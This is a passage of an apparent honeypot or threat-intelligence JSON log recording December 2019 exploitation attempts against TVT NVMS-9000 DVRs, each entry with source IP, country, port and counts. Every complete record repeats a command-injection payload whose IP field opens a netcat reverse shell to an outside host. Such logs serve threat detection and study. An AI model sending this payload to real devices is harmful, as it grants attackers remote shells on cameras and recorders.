- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T13:30:44Z",
- "last_seen": "2019-12-19T13:30:44Z"
- },
- {
- "source_ip_address": "24.171.35.147",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T13:23:36Z",
- "last_seen": "2019-12-19T13:23:36Z"
- },
- {
- "source_ip_address": "138.255.73.244",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 64,
- "first_seen": "2019-12-19T13:22:40Z",
- "last_seen": "2019-12-19T13:22:40Z"
- },
- {
- "source_ip_address": "14.41.119.147",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T13:10:06Z",
- "last_seen": "2019-12-19T13:10:06Z"
- },
- {
- "source_ip_address": "185.61.137.172",
- "country": "NL",
- "user_agent": "ApiTool",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 370,
- "first_seen": "2019-12-19T12:26:05Z",
- "last_seen": "2019-12-19T12:34:12Z"
- },
- {
- "source_ip_address": "60.53.184.44",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T12:24:56Z",
- "last_seen": "2019-12-19T12:24:56Z"
- },
- {
- "source_ip_address": "219.85.136.137",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T12:22:59Z",
- "last_seen": "2019-12-19T12:22:59Z"
- },
- {
- "source_ip_address": "179.159.199.181",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T12:21:34Z",
- "last_seen": "2019-12-19T12:21:34Z"
- },
- {
- "source_ip_address": "75.67.90.89",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T12:16:42Z",
- "last_seen": "2019-12-19T12:16:42Z"
- },
- {
- "source_ip_address": "41.39.49.23",
- "country": "EG",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T11:56:46Z",
- "last_seen": "2019-12-19T11:56:46Z"
- },
- {
- "source_ip_address": "112.219.87.98",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 72,
- "first_seen": "2019-12-19T11:52:56Z",
- "last_seen": "2019-12-19T11:52:56Z"
- },
- {
- "source_ip_address": "201.114.190.164",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-19T11:42:57Z",
- "last_seen": "2019-12-19T11:42:57Z"
- },
- {
- "source_ip_address": "179.185.208.65",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T11:38:54Z",
- "last_seen": "2019-12-19T11:38:54Z"
- },
- {
- "source_ip_address": "94.14.157.27",
- "country": "GB",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T11:30:18Z",
- "last_seen": "2019-12-19T11:30:18Z"
- },
- {
- "source_ip_address": "50.195.140.108",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T11:23:13Z",
- "last_seen": "2019-12-19T11:23:13Z"
- },
- {
- "source_ip_address": "114.34.138.95",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T11:08:02Z",
- "last_seen": "2019-12-19T11:08:02Z"
- },
- {
- "source_ip_address": "189.130.46.121",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T11:04:49Z",
- "last_seen": "2019-12-19T11:04:49Z"
- },
- {
- "source_ip_address": "182.191.76.252",
- "country": "PK",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T10:46:24Z",
- "last_seen": "2019-12-19T10:46:24Z"
- },
- {
- "source_ip_address": "71.42.201.68",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-19T10:46:16Z",
- "last_seen": "2019-12-19T10:46:16Z"
- },
- {
- "source_ip_address": "24.171.35.147",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 77,
- "first_seen": "2019-12-19T10:43:00Z",
- "last_seen": "2019-12-19T10:43:00Z"
- },
- {
- "source_ip_address": "178.164.208.101",
- "country": "HU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T10:40:23Z",
- "last_seen": "2019-12-19T10:40:23Z"
- },
- {
- "source_ip_address": "109.104.226.44",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T10:26:52Z",
- "last_seen": "2019-12-19T10:26:52Z"
- },
- {
- "source_ip_address": "187.236.44.226",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T10:17:57Z",
- "last_seen": "2019-12-19T10:17:57Z"
- },
- {
- "source_ip_address": "78.97.193.222",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-19T03:20:16Z",
- "last_seen": "2019-12-19T09:45:40Z"
- },
- {
- "source_ip_address": "170.233.134.82",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T09:41:02Z",
- "last_seen": "2019-12-19T09:41:02Z"
- },
- {
- "source_ip_address": "72.80.19.63",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 83,
- "first_seen": "2019-12-19T09:32:48Z",
- "last_seen": "2019-12-19T09:32:48Z"
- },
- {
- "source_ip_address": "100.2.243.72",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-19T09:30:05Z",
- "last_seen": "2019-12-19T09:30:05Z"
- },
- {
- "source_ip_address": "202.160.16.212",
- "country": "BN",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
